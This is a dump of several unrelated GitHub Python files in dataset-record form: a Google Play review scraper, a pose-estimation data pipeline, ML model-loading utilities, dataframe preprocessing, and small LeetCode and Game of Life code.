get_source(self) -> None:\n \"\"\"\n Parse and save the webpage source\n \"\"\"\n self.source = -1 # delete previously parsed source\n self.source = BeautifulSoup(self.driver.page_source, features = \"lxml\")\n return\n #\n def val_source(self) -> None:\n \"\"\"\n Validate the page was parsed and saved\n \"\"\"\n if self.source == -1:\n raise ValueError('The page was not parsed. Make sure you run `get_source()` method first.')\n #\n def reset_delta(self) -> None:\n \"\"\"\n Reset iteration movement tracking\n \"\"\"\n self.delta = list(reversed(range(5)))\n #\n def val_movement(self) -> None:\n \"\"\"\n Validate the scrolling is working\n \"\"\"\n self.delta.insert(0, self.position)\n self.delta.pop()\n if min(self.delta) == max(self.delta):\n raise RuntimeError('The scrolling process seems to have stopped moving.')\n #\n def run_it(self, max_iter: int = 1000, rate: float = 1) -> None:\n \"\"\"\n Start the process of loading the reviews\n\n Parameters\n ----------\n max_iter : int\n a number defining how many times will be method `move_it` used\n rate : float\n waiting time between subsequent calls to method `move_it`\n - should be large enough for the webdriver to load new content\n \"\"\"\n i = 0\n while i < max_iter:\n self.move_it()\n self.val_movement()\n i += 1\n time.sleep(rate)\n self.unwrap_reviews()\n self.get_source()\n #\n def extract_short(self) -> List[str]:\n \"\"\"\n Extract the short reviews\n\n Returns\n -------\n list\n list containing short reviews\n - position is empty ('') for unwrapped reviews\n \"\"\"\n self.val_source()\n reviews_div = self.source.select('span[jsname=\"bN97Pc\"]')\n reviews_txt = [i.text for i in reviews_div]\n return(reviews_txt)\n #\n def extract_long(self) -> List[str]:\n \"\"\"\n Extract the long (wrapped) reviews\n\n Returns\n -------\n list\n list containing long reviews\n - position is empty ('') for short reviews\n \"\"\"\n self.val_source()\n unwrapped_div = self.source.select('span[jsname=\"fbQN7e\"]')\n unwrapped_txt = [i.text for i in unwrapped_div]\n return(unwrapped_txt)\n #\n def collect_reviews(self) -> List[str] or List[List[str]]:\n \"\"\"\n Collect all reviews. Tries to match short and long reviews into a single list\n\n Returns\n -------\n list\n list of matched reviews, or list of lists of reviews\n \"\"\"\n short = self.extract_short()\n long = self.extract_long()\n empty_fit = [l == '' for l in long] != [s == '' for s in short]\n if empty_fit:\n reviews = [val + long[ix] for ix, val in enumerate(short)]\n else:\n reviews = [short, long]\n return(reviews)\n #\n def collect_rating(self) -> List[str]:\n \"\"\"\n Colect user ratings of the app\n\n Returns\n -------\n list\n list containing how was the app rated by user\n \"\"\"\n self.val_source()\n if self.lang == 'cs':\n rating = self.source.select('span.nt2C1d > div.pf5lIe > div[aria-label*=Hodnocení]')\n else:\n rating = self.source.select('span.nt2C1d > div.pf5lIe > div[aria-label*=Rated]')\n rat_int = [\n re.findall('\\d+', r.get('aria-label'))[0]\n for r in rating\n ]\n return(rat_int)\n #\n def collect_support(self) -> List[str]:\n \"\"\"\n Collect the support of the review\n\n Returns\n -------\n list\n list containing how was the review rated by other users\n \"\"\"\n self.val_source()\n support = self.source.select('div[class=\"jUL89d y92BAb\"]')\n return([s.text for s in support])\n #\n def collect_data(self) -> pd.DataFrame:\n \"\"\"\n Collect all data into a pandas.DataFrame\n\n Returns\n -------\n pandas.core.frame.DataFrame\n table of reviews, ratings and support\n \"\"\"\n self.get_source()\n return(\n pd.DataFrame({\n 'review' : self.collect_reviews(),\n 'rating' : self.collect_rating(),\n 'support' : self.collect_support()\n })\n )","repo_name":"mikayelh/ies_gplay_scraper","sub_path":"app_reviews.py","file_name":"app_reviews.py","file_ext":"py","file_size_in_byte":7708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"29232422586","text":"'''\nTesting delta_eps backend.\n'''\n\nimport unittest\nimport numpy as np\nfrom delta_eps import *\n\n_NUM_TRIALS_ = 100\n\nclass test_delta_eps(unittest.TestCase):\n '''\n Test functions in delta_eps.py\n '''\n def test_compute_delta(self):\n '''\n Test computation of delta from epsilon for linear functions. If f(x) = mx + b, then given\n eps, delta should equal eps / m\n '''\n for seed in range(_NUM_TRIALS_):\n np.random.seed(seed)\n \n m = np.random.uniform(-10, 10)\n b = np.random.uniform(-10, 10)\n\n f = lambda x: m * x + b \n\n x_minmax = np.random.uniform(-10, 10, size = 2)\n x_min = np.min(x_minmax)\n x_max = np.max(x_minmax)\n\n y_range = np.abs(f(x_max) - f(x_min)) # max(f) - min(f)\n eps = np.random.uniform(1e-3, 1e-1) * y_range\n\n delta_true = eps / np.abs(m)\n\n # so that (a - delta, a + delta) stays in domain\n a = np.random.uniform(x_min + delta_true, x_max - delta_true)\n L = f(a)\n\n delta_stepsize = np.random.uniform(1e-7, 1e-4)\n\n delta = compute_delta(f, a, L, eps, x_min, x_max, delta_stepsize = delta_stepsize)\n\n self.assertTrue(delta_true - delta_stepsize <= delta)\n self.assertTrue(delta <= delta_true + delta_stepsize)\n\n\nif __name__ == \"__main__\":\n unittest.main() \n\n\n\n","repo_name":"PhillipLo/calc-viz","sub_path":"modules/delta_eps/test_delta_eps.py","file_name":"test_delta_eps.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"32557160439","text":"import pickle\r\nimport streamlit as st\r\nfrom xgboost import Booster, DMatrix\r\nfrom tensorflow.keras.models import load_model\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nMODEL_PATH = '../Training V3/trained_models3'\r\nRESULTS_PATH = '../Training V3/results3'\r\n\r\n# Saving encoded Tokenizer model utility\r\n\r\n\r\ndef save_model_pickle(model, filename):\r\n try:\r\n pickle.dump(model, open(f'{MODEL_PATH}/{filename}', 'wb'))\r\n print('Saved')\r\n except Exception as err:\r\n print(err)\r\n\r\n\r\n# Loading saved Pickle model\r\ndef load_model_pickle(filename):\r\n try:\r\n model = pickle.load(open(f'{MODEL_PATH}/{filename}', 'rb'))\r\n return model\r\n except Exception as err:\r\n print(err)\r\n return None\r\n\r\n\r\n@st.cache_resource\r\ndef get_trained_model(algorithm):\r\n model = None\r\n\r\n if algorithm.startswith('Naive'):\r\n model = load_model_pickle(filename='nb_model.pickle')\r\n\r\n elif algorithm.startswith('Support Vector'):\r\n model = load_model_pickle(filename='svc_model.pickle')\r\n\r\n elif algorithm.startswith('Random'):\r\n model = load_model_pickle(filename='rf_model.pickle')\r\n\r\n elif algorithm.startswith('XGB'):\r\n # model = load_model_pickle(filename='xgb_model.pickle')\r\n model = Booster({'nthread': 2})\r\n model.load_model(f'{MODEL_PATH}/xgb_model.json')\r\n\r\n elif algorithm.startswith('ANN'):\r\n # loading keras-based ANN trained model\r\n model = load_model(f'{MODEL_PATH}/ann_model.h5')\r\n\r\n elif algorithm.startswith('All'):\r\n nb = load_model_pickle(filename='nb_model.pickle')\r\n svc = load_model_pickle(filename='svc_model.pickle')\r\n rf = load_model_pickle(filename='rf_model.pickle')\r\n\r\n xgb = Booster({'nthread': 2})\r\n xgb.load_model(f'{MODEL_PATH}/xgb_model.json')\r\n\r\n nn = load_model(f'{MODEL_PATH}/ann_model.h5')\r\n results = {\r\n 'nb': nb,\r\n 'svc': svc,\r\n 'rf': rf,\r\n 'xgb': xgb,\r\n 'nn': nn\r\n }\r\n return results\r\n\r\n return model\r\n\r\n\r\n# loading sclale data\r\ndef load_scale_data():\r\n return pd.read_csv(f'{RESULTS_PATH}/scale_data_df.csv', index_col=0)\r\n\r\n# getting code for each model\r\n\r\n\r\ndef get_model_code(algorithm):\r\n if algorithm.startswith('Naive'):\r\n return 'nb'\r\n elif algorithm.startswith('Support Vector'):\r\n return 'svc'\r\n elif algorithm.startswith('Random'):\r\n return 'rf'\r\n elif algorithm.startswith('XGB'):\r\n return 'xgb'\r\n elif algorithm.startswith('ANN'):\r\n return 'nn'\r\n else: # default\r\n return 'rf'\r\n\r\n# getting model name from code\r\n\r\n\r\ndef get_model_name_from_code(code):\r\n if code.startswith('nb'):\r\n return \"Naive Bayes\"\r\n elif code.startswith('rf'):\r\n return \"Random Forest\"\r\n elif code.startswith('svc'):\r\n return \"Support Vector Classifier\"\r\n elif code.startswith('nn'):\r\n return \"Neural Networks\"\r\n elif code.startswith('xgb'):\r\n return \"XGBoost\"\r\n else:\r\n return ''\r\n\r\n# Make prediction\r\n\r\n\r\ndef make_prediction(model=None, recency=0, frequency=0, monetary=0.0, model_code='rf', col=None):\r\n \"\"\"\r\n Scales and preprocesses input datapoints and make prediction using 'model'\r\n\r\n Args:\r\n model: trained model to use. An instance of one of (RF, NB, SVC, ANN, XGB )\r\n recency: Number of days ago since customer last patronized (days)\r\n frequency: Number of times customer patronized (int)\r\n monetary: Total money spent by customer across all transactions\r\n model_code: code name for trained model type\r\n Values:\r\n 'rf' for Random Forest | \r\n 'nb' for Naive Baye's | \r\n 'svc' for Support Vector Classifier | \r\n 'nn' for Neural Networks | \r\n 'xgb' for XGBoost |\r\n 'all' for all trained models\r\n\r\n \"\"\"\r\n\r\n # scaling the data collected\r\n scale_data = load_scale_data()\r\n scaled_recency = (\r\n recency - scale_data.mini[0]) / (scale_data.maxi[0] - scale_data.mini[0])\r\n scaled_frequency = (\r\n frequency - scale_data.mini[1]) / (scale_data.maxi[1] - scale_data.mini[1])\r\n scaled_monetary = (\r\n monetary - scale_data.mini[2]) / (scale_data.maxi[2] - scale_data.mini[2])\r\n\r\n temp = pd.DataFrame(np.array([\r\n recency, frequency, monetary]).reshape(1, -1),\r\n columns=['Recency', 'Frequency', 'Monetary'])\r\n\r\n input_data = pd.DataFrame(np.array([\r\n scaled_recency, scaled_frequency, scaled_monetary]).reshape(1, -1),\r\n columns=['Recency', 'Frequency', 'Monetary'])\r\n\r\n col.write('Raw Input Data:')\r\n col.dataframe(temp)\r\n\r\n col.write('Scaled Input Data:')\r\n col.dataframe(input_data)\r\n prediction = None\r\n\r\n if model_code == 'all':\r\n predictions = None\r\n predictions = dict()\r\n\r\n # loading trained models\r\n\r\n results = get_trained_model(algorithm='All')\r\n\r\n nb = results['nb']\r\n svc = results['svc']\r\n rf = results['rf']\r\n xgb = results['xgb']\r\n nn = results['nn']\r\n\r\n # making predictions\r\n predictions['nb_pred'] = nb.predict_proba(input_data)\r\n predictions['rf_pred'] = rf.predict_proba(input_data)\r\n predictions['svc_pred'] = svc.predict_proba(input_data)\r\n # XGB\r\n predictions['xgb_pred'] = xgb.predict(DMatrix(input_data))\r\n # ANN\r\n predictions['nn_pred'] = nn.predict(input_data)\r\n\r\n return predictions\r\n\r\n elif model_code == 'xgb':\r\n prediction = model.predict(DMatrix(input_data))\r\n\r\n elif model_code == 'nn':\r\n prediction = model.predict(input_data)\r\n\r\n elif model_code in ['rf', 'svc', 'nb']:\r\n prediction = model.predict_proba(input_data)\r\n\r\n if prediction is None:\r\n st.error('Something went wrong. Sorry, Could not make prediction')\r\n\r\n return prediction\r\n","repo_name":"SimeonDee/customer-purchase-behaviour-analysis-and-prediction","sub_path":"Lola eCommerce Customer Purchase Behaviour/purchase_behaviour_prediction_app/InferenceApp/myutils.py","file_name":"myutils.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"31088304771","text":"import os\nimport cv2\nimport numpy as np\n\nfrom pycocotools.coco import maskUtils\n\nfrom tensorpack.dataflow.common import BatchData, MapData\nfrom tensorpack.dataflow.common import TestDataSpeed\nfrom tensorpack.dataflow.parallel import PrefetchDataZMQ\n\nfrom training.augmentors import ScaleAug, RotateAug, CropAug, FlipAug, \\\n joints_to_point8, point8_to_joints, AugImgMetadata\nfrom training.dataflow import CocoDataFlow, JointsLoader, COCODataPaths\nfrom training.label_maps import create_heatmap, create_paf\n\n\nALL_PAF_MASK = np.repeat(\n np.ones((46, 46, 1), dtype=np.uint8), 38, axis=2)\n\nALL_HEATMAP_MASK = np.repeat(\n np.ones((46, 46, 1), dtype=np.uint8), 19, axis=2)\n\nAUGMENTORS_LIST = [\n ScaleAug(scale_min=0.5,\n scale_max=1.1,\n target_dist=0.6,\n interp=cv2.INTER_CUBIC),\n\n RotateAug(rotate_max_deg=40,\n interp=cv2.INTER_CUBIC,\n border=cv2.BORDER_CONSTANT,\n border_value=(128, 128, 128), mask_border_val=1),\n\n CropAug(368, 368, center_perterb_max=40, border_value=(128, 128, 128),\n mask_border_val=1),\n\n FlipAug(num_parts=18, prob=0.5),\n ]\n\n\ndef read_img(components):\n \"\"\"\n Loads image from meta.img_path. Assigns the image to\n the field img of the same meta instance.\n\n :param components: components\n :return: updated components\n \"\"\"\n meta = components[0]\n img_buf = open(meta.img_path, 'rb').read()\n\n if not img_buf:\n raise Exception('image not read, path=%s' % meta.img_path)\n\n arr = np.fromstring(img_buf, np.uint8)\n meta.img = cv2.imdecode(arr, cv2.IMREAD_COLOR)\n meta.height, meta.width = meta.img.shape[:2]\n\n return components\n\n\ndef gen_mask(components):\n \"\"\"\n Generate masks based on the coco mask polygons.\n\n :param components: components\n :return: updated components\n \"\"\"\n meta = components[0]\n if meta.masks_segments:\n mask_miss = np.ones((meta.height, meta.width), dtype=np.uint8)\n for seg in meta.masks_segments:\n bin_mask = maskUtils.decode(seg)\n bin_mask = np.logical_not(bin_mask)\n mask_miss = np.bitwise_and(mask_miss, bin_mask)\n\n meta.mask = mask_miss\n\n return components\n\n\ndef augment(components):\n \"\"\"\n Augmenting of images.\n\n :param components: components\n :return: updated components.\n \"\"\"\n meta = components[0]\n\n aug_center = meta.center.copy()\n aug_joints = joints_to_point8(meta.all_joints)\n\n for aug in AUGMENTORS_LIST:\n (im, mask), params = aug.augment_return_params(\n AugImgMetadata(img=meta.img,\n mask=meta.mask,\n center=aug_center,\n scale=meta.scale))\n\n # augment joints\n aug_joints = aug.augment_coords(aug_joints, params)\n\n # after flipping horizontaly the left side joints and right side joints are also\n # flipped so we need to recover their orginal orientation.\n if isinstance(aug, FlipAug):\n aug_joints = aug.recover_left_right(aug_joints, params)\n\n # augment center position\n aug_center = aug.augment_coords(aug_center, params)\n\n meta.img = im\n meta.mask = mask\n\n meta.aug_joints = point8_to_joints(aug_joints)\n meta.aug_center = aug_center\n\n return components\n\n\ndef apply_mask(components):\n \"\"\"\n Applies the mask (if exists) to the image.\n\n :param components: components\n :return: updated components\n \"\"\"\n meta = components[0]\n if meta.mask is not None:\n meta.img[:, :, 0] = meta.img[:, :, 0] * meta.mask\n meta.img[:, :, 1] = meta.img[:, :, 1] * meta.mask\n meta.img[:, :, 2] = meta.img[:, :, 2] * meta.mask\n return components\n\n\ndef create_all_mask(mask, num, stride):\n \"\"\"\n Helper function to create a stack of scaled down mask.\n\n :param mask: mask image\n :param num: number of layers\n :param stride: parameter used to scale down the mask image because it has\n the same size as orginal image. We need the size of network output.\n :return:\n \"\"\"\n scale_factor = 1.0 / stride\n small_mask = cv2.resize(mask, (0, 0), fx=scale_factor, fy=scale_factor, interpolation=cv2.INTER_CUBIC)\n small_mask = small_mask[:, :, np.newaxis]\n return np.repeat(small_mask, num, axis=2)\n\n\ndef build_sample(components):\n \"\"\"\n Builds a sample for a model.\n\n :param components: components\n :return: list of final components of a sample.\n \"\"\"\n meta = components[0]\n image = meta.img\n\n if meta.mask is None:\n mask_paf = ALL_PAF_MASK\n mask_heatmap = ALL_HEATMAP_MASK\n else:\n mask_paf = create_all_mask(meta.mask, 38, stride=8)\n mask_heatmap = create_all_mask(meta.mask, 19, stride=8)\n\n heatmap = create_heatmap(JointsLoader.num_joints_and_bkg, 46, 46,\n meta.aug_joints, 7.0, stride=8)\n\n pafmap = create_paf(JointsLoader.num_connections, 46, 46,\n meta.aug_joints, 1, stride=8)\n\n # release reference to the image/mask/augmented data. Otherwise it would easily consume all memory at some point\n meta.mask = None\n meta.img = None\n meta.aug_joints = None\n meta.aug_center = None\n return [image.astype(np.uint8), mask_paf, mask_heatmap, pafmap, heatmap]\n\n\ndef get_dataflow(coco_data_paths):\n \"\"\"\n This function initializes the tensorpack dataflow and serves generator\n for training operation.\n\n :param coco_data_paths: paths to the coco files: annotation file and folder with images\n :return: dataflow object\n \"\"\"\n df = CocoDataFlow((368, 368), coco_data_paths)\n df.prepare()\n df = MapData(df, read_img)\n df = MapData(df, gen_mask)\n df = MapData(df, augment)\n df = MapData(df, apply_mask)\n df = MapData(df, build_sample)\n df = PrefetchDataZMQ(df, nr_proc=4) #df = PrefetchData(df, 2, 1)\n\n return df\n\n\ndef batch_dataflow(df, batch_size):\n \"\"\"\n The function builds batch dataflow from the input dataflow of samples\n\n :param df: dataflow of samples\n :param batch_size: batch size\n :return: dataflow of batches\n \"\"\"\n df = BatchData(df, batch_size, use_list=False)\n df = MapData(df, lambda x: (\n [x[0], x[1], x[2]],\n [x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4]])\n )\n df.reset_state()\n return df\n\n\nif __name__ == '__main__':\n \"\"\"\n Run this script to check speed of generating samples. Tweak the nr_proc\n parameter of PrefetchDataZMQ. Ideally it should reflect the number of cores \n in your hardware\n \"\"\"\n batch_size = 10\n curr_dir = os.path.dirname(__file__)\n annot_path = os.path.join(curr_dir, '../dataset/annotations/person_keypoints_val2017.json')\n img_dir = os.path.abspath(os.path.join(curr_dir, '../dataset/val2017/'))\n df = CocoDataFlow((368, 368), COCODataPaths(annot_path, img_dir))#, select_ids=[1000])\n df.prepare()\n df = MapData(df, read_img)\n df = MapData(df, gen_mask)\n df = MapData(df, augment)\n df = MapData(df, apply_mask)\n df = MapData(df, build_sample)\n df = PrefetchDataZMQ(df, nr_proc=4)\n df = BatchData(df, batch_size, use_list=False)\n df = MapData(df, lambda x: (\n [x[0], x[1], x[2]],\n [x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4]])\n )\n\n TestDataSpeed(df, size=100).start()\n","repo_name":"michalfaber/keras_Realtime_Multi-Person_Pose_Estimation","sub_path":"training/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7431,"program_lang":"python","lang":"en","doc_type":"code","stars":780,"dataset":"github-code","pt":"65"} +{"seq_id":"19215747599","text":"#\n# @lc app=leetcode id=129 lang=python3\n#\n# [129] Sum Root to Leaf Numbers\n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def sumNumbers(self, root: TreeNode) -> int:\n self.sum = 0\n self.sovler(root, 0)\n return self.sum\n \n def sovler(self, root, path):\n if not root:\n return\n path = path * 10 + root.val\n if not root.left and not root.right:\n self.sum += path\n return\n self.sovler(root.left, path)\n self.sovler(root.right, path)\n# ✔ Accepted\n# ✔ 110/110 cases passed (28 ms)\n# ✔ Your runtime beats 99.68 % of python3 submissions\n# ✔ Your memory usage beats 5.55 % of python3 submissions (13.9 MB)\n# if __name__ == \"__main__\":\n# root = TreeNode(1)\n# root.left = TreeNode(2)\n# root.right = TreeNode(3)\n\n\n # res = Solution().sumNumbers(root)\n","repo_name":"DizzyYunxuan/Leetcode_answers","sub_path":"129.sum-root-to-leaf-numbers.py","file_name":"129.sum-root-to-leaf-numbers.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"13532270015","text":"import pandas as pd\nimport numpy as np\nimport pickle as pkl\n\n#from tqdm.notebook import tqdm\nfrom tqdm import tqdm\n\nfrom utilities.utility import create_dummy_image\nfrom utilities.utility import dummy_crop_image\nfrom utilities.utility import fetch_all_samples_hdf5\n\nfrom utilities.sequencer_utils import time_in_seconds\nfrom utilities.sequencer_utils import convert_to_epoch\nfrom utilities.utility import generate_file_name\nfrom utilities.utility import standardize_img\n# To set to 0 later\nDEBUG = 1\n\n# Root directory\nROOT_DIR = '.'\n\n# Max size to write on memory\nBLOCK_MAX_SIZE = 20000\n\n\"\"\"\nGroups the dataframe per column and sorts it with respect to timestamps\nArgs:\n start_time: timestamp \nReturns:\n Dataframe chunk containing rows with specified path\n\"\"\"\ndef group_by(df, column):\n try:\n grouped = df.groupby(column, as_index=False, sort=False).apply(lambda x: x.sort_index(ascending=True))\n except KeyError:\n return None\n return grouped\n\n\"\"\"\nGenerates the intermediate dictionaries that will be used to produce data chunks for the model\nArgs:\n args: Object containing arguments\n df: original dataframe \n list_stations: list of stations\nReturns:\n list containing training data\n\"\"\"\ndef generate_stations_dictionaries(args, df, list_stations):\n # First step: organize the dataframe with respect to file paths\n grouped = group_by(df, 'hdf5_8bit_path')\n unique_paths = np.unique(df['hdf5_8bit_path'])\n\n # timer\n t1 = tqdm(total=len(unique_paths))\n nb_rows = 0\n records = {}\n # Creating dictionaries\n for s in list_stations:\n records[s] = []\n\n # Main loop\n for path in unique_paths:\n # Grouping by paths\n cropped_df = grouped[grouped.hdf5_8bit_path == path].sort_index(axis=0)\n offsets = cropped_df['hdf5_8bit_offset'].values\n # Collecting cropped images from the compressed data\n #dic = dummy_crop_image(path)\n dic = fetch_all_samples_hdf5(args, path)\n\n # Iterating throw stations\n for index, row in cropped_df.iterrows():\n img = None\n station_id = row['station']\n offset = row['hdf5_8bit_offset']\n try:\n img = standardize_img(dic[station_id][offset])\n except KeyError:\n img = create_dummy_image()\n\n # Generating row and adding it to the list\n df_timestamp = row['iso-datetime']\n new_row = {'iso-datetime': convert_to_epoch(df_timestamp),\n 'station': row['station'],\n 'day': df_timestamp.day,\n 'month': df_timestamp.month,\n #'hour': df_timestamp.hour,\n #'local_time': time_in_seconds(df_timestamp),\n 'image': img,\n 'CLEARSKY_GHI': row['CLEARSKY_GHI'],\n 'GHI': row['GHI']}\n records[station_id].append(new_row)\n nb_rows += 1\n \n t1.update(1)\n print('Generated %d rows in total' % nb_rows)\n return records\n\n\n\n\ndef dump_station_data(station_name, records, root_dir, seq_dic, db):\n print('Dumping data for station %s...' % station_name)\n seq_dic[station_name] += 1\n filename = generate_file_name()\n filepath = root_dir + '/' + filename + '.dat'\n new_row = {'station': station_name,'seq': seq_dic[station_name], 'df_path':filepath}\n db.append(new_row)\n # Dumping data on disk\n pkl.dump(records, open(filepath, \"wb\" ))\n\n\n\"\"\"\nGenerates the intermediate data chunks for the model\nArgs:\n args: Object containing arguments\n df: original dataframe \n list_stations: list of stations\nReturns:\n Joint table to retrieve the blocks\n\"\"\"\ndef generate_memory_blocks(args, df, list_stations, root_dir = ROOT_DIR + '/output/', db_path = 'database.db'):\n # Dataframe containing blocks info to access them\n db_list = []\n seq_dic = {}\n\n # First step: organize the dataframe with respect to file paths\n grouped = group_by(df, 'hdf5_8bit_path')\n unique_paths = np.unique(df['hdf5_8bit_path'])\n\n # timer\n t1 = tqdm(total=len(unique_paths))\n nb_rows = 0\n records = {}\n \n # Creating dictionaries\n for s in list_stations:\n records[s] = []\n seq_dic[s] = 0\n\n # Main loop\n for path in unique_paths:\n # Grouping by paths\n cropped_df = grouped[grouped.hdf5_8bit_path == path].sort_index(axis=0)\n # Collecting cropped images from the compressed data\n #dic = dummy_crop_image(path)\n dic = fetch_all_samples_hdf5(args, path)\n\n # Iterating through stations\n for index, row in cropped_df.iterrows():\n img = None\n station_id = row['station']\n offset = row['hdf5_8bit_offset']\n try:\n #img = standardize_img(dic[station_id][offset])\n img = dic[station_id][offset]\n except KeyError:\n img = create_dummy_image()\n\n # Generating row and adding it to the list\n df_timestamp = row['iso-datetime']\n new_row = {'iso-datetime': convert_to_epoch(df_timestamp),\n 'station': row['station'],\n 'day': df_timestamp.day,\n 'month': df_timestamp.month,\n 'hour': df_timestamp.hour,\n 'local_time': time_in_seconds(df_timestamp),\n 'image': img,\n 'CLEARSKY_GHI': row['CLEARSKY_GHI'],\n 'GHI': row['GHI']}\n records[station_id].append(new_row)\n nb_rows += 1\n \n # Check if we reached max size\n for s in list_stations:\n if len(records[s]) >= BLOCK_MAX_SIZE:\n # Writing data on memory\n dump_station_data(s, records[s], root_dir, seq_dic, db_list)\n # Flushing out memory\n records[s] = []\n # Tqdm counter\n t1.update(1)\n \n # Last pass to write whatever is left\n for s in list_stations:\n if len(records[s]) > 0:\n # Writing data on memory\n dump_station_data(s, records[s], root_dir, seq_dic, db_list)\n records[s] = []\n print('Generated %d rows in total' % nb_rows)\n print('Saving the joint table...')\n db_df = pd.DataFrame(db_list)\n db_df.to_pickle(db_path)\n return db_df\n\n\n\"\"\"\nGets list of indexes given a size and a slice offset\nArgs:\n total_size: size to split\n slice: size of each chunk\nReturns:\n list of indexes corresponding to the splits\n\"\"\"\ndef get_n_slices(total_size, slice):\n indexes = []\n nb_slices = int(total_size / slice)\n for idx in range(nb_slices + 1):\n indexes.append(idx * slice)\n return indexes\n\n\n\"\"\"\nGenerates sub-lists from the main lists\nArgs:\n records: list of data\n slice_size: maximum size allowed\nReturns:\n List of sub-blocks\n\"\"\"\ndef generate_blocks_from_lists(records, slice_size):\n mini_blocks = []\n slices = get_n_slices(len(records), slice_size)\n nb_slices = len(slices)\n last = len(records) - 1\n for index in reversed(slices):\n mini_blocks.insert(0, records[index:last])\n last = index\n return mini_blocks\n\n\n\"\"\"\nSaves blocks in the disk\nArgs:\n records: list of data\n list_stations: list of stations\n root_dir: folder\n slice_size: maximum size allowed\nReturns:\n Dataframe with records pointing to the files locations\n\"\"\"\ndef write_blocks_on_disk(records, list_stations, root_dir = ROOT_DIR + '/data/preprocessed/', slice_size = 30000, df_path = 'database.db' ):\n db_list = []\n t1 = tqdm(total=len(list_stations))\n for s in list_stations:\n # Getting records\n records_list = records[s]\n # Slicing\n mini_blocks = generate_blocks_from_lists(records_list, slice_size)\n i = 0\n for b in mini_blocks:\n i = i + 1\n filename = generate_file_name()\n filepath = root_dir + filename + '.dat'\n new_row = {'station': s,\n 'seq':i,\n 'df_path':filepath}\n db_list.append(new_row)\n # Dumping data on disk\n pkl.dump(b, open(filepath, \"wb\" ) )\n t1.update(1)\n db = pd.DataFrame(db_list)\n db.to_pickle(df_path)\n return db\n\n\n\n\n\"\"\"\nReads data-frame information from database\nArgs:\n records: list of data\nReturns:\n Dictionary-representation of the dataframe\n\"\"\"\ndef read_db(db_df):\n stations_mapping = {}\n # First step: organize the dataframe with respect to stations\n grouped = group_by(db_df, 'station')\n unique_stations = np.unique(db_df['station'])\n\n # Iterating throw stations\n for station in unique_stations:\n stations_mapping[station] = {}\n cropped_df = grouped[grouped.station == station]\n sequences = sorted(cropped_df['seq'].values)\n for seq in sequences:\n row = cropped_df.query(f'station == \"{station}\" and seq=={seq}', inplace=False)\n stations_mapping[station][seq] = row['df_path'].values[0]\n return stations_mapping\n","repo_name":"raghavgupta0296/IFT-6759-Team-13","sub_path":"utilities/intermediate_code/dataframe_utils.py","file_name":"dataframe_utils.py","file_ext":"py","file_size_in_byte":9139,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"17553155509","text":"from readers import read_controls\nfrom os.path import join\n\nasr_root = \"/home/samf/museum_speech\"\ncontrols = read_controls(join(asr_root, \"24_03_2016/controls\"))\n\ncontrol_list = sorted(controls.keys())\n\nfor i in range(0, len(control_list)):\n\tbase = control_list[i]\n\tcontrol_init, read_back = controls[base]\n\tprint(base,control_init)\n\tfor key in read_back:\n\t\ttime, num = read_back[key]\n\t\tprint(key, time, num)\n","repo_name":"samuelfernando/spodiro-asr","sub_path":"post_proc/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"23162483319","text":"#!/bin/env python3\n\n\"\"\"\nClass representing a cell.\nEach cell is linked to its grid\nIt can be either dead or alive\n\"\"\"\nclass Cell:\n\n def __init__(self, ipos, jpos, grid, state=0):\n \"\"\"\n Constructor for class cell\n \"\"\"\n # Cell position\n self.ipos = ipos\n self.jpos = jpos\n\n # Cell state\n self.state = False\n\n # Grid to which the cell belongs\n self.grid = grid\n\n def live(self):\n \"\"\"\n Make the cell \"live\" / \"born\" (set its state to True)\n \"\"\"\n if not self.state:\n self.grid.alive_cell_counter += 1\n self.state = True\n\n def die(self):\n \"\"\"\n Make the cell \"die\" (set its state to False)\n \"\"\"\n if self.state:\n self.grid.alive_cell_counter -= 1\n self.state = False\n\n\n def count_alive_neighbors(self):\n \"\"\"\n **return:**\n * The number of alive neighbors of the cell.\n \"\"\"\n n_alive_neighbors = 0\n for neighbor in self.grid.neighbors(self):\n if neighbor.state:\n n_alive_neighbors += 1\n\n return n_alive_neighbors\n","repo_name":"GaetanLepage/pyEvolve","sub_path":"src/entities/cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"27238616257","text":"\"\"\"\nGiven an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.\n\nYou may assume that the array is non-empty and the majority element always exist in the array.\n\nExample 1:\n\nInput: [3,2,3]\nOutput: 3\nExample 2:\n\nInput: [2,2,1,1,1,2,2]\nOutput: 2\n\"\"\"\n# 192ms. 82 percentile.\n# question guarantees an answer, so we don't need the check part of boyer moore that is commented out. \nclass Solution:\n def majorityElement(self, nums: List[int]) -> int:\n # Boyer Moore\n count = 0\n candidate = \"\"\n for num in nums:\n if count == 0:\n candidate = num\n if num == candidate:\n count += 1\n else:\n count -= 1\n \n # check = 0\n # for num in nums:\n # if num == candidate:\n # check += 1\n \n # return candidate if check >= 1 + len(nums)//2 else \"\"\n \n return candidate\n\n\n\n\"\"\"\nNotes:\nSee notes on Boyer Moore\n\"\"\"","repo_name":"JackMGrundy/coding-challenges","sub_path":"common-problems-leetcode/easy/majority-element.py","file_name":"majority-element.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} 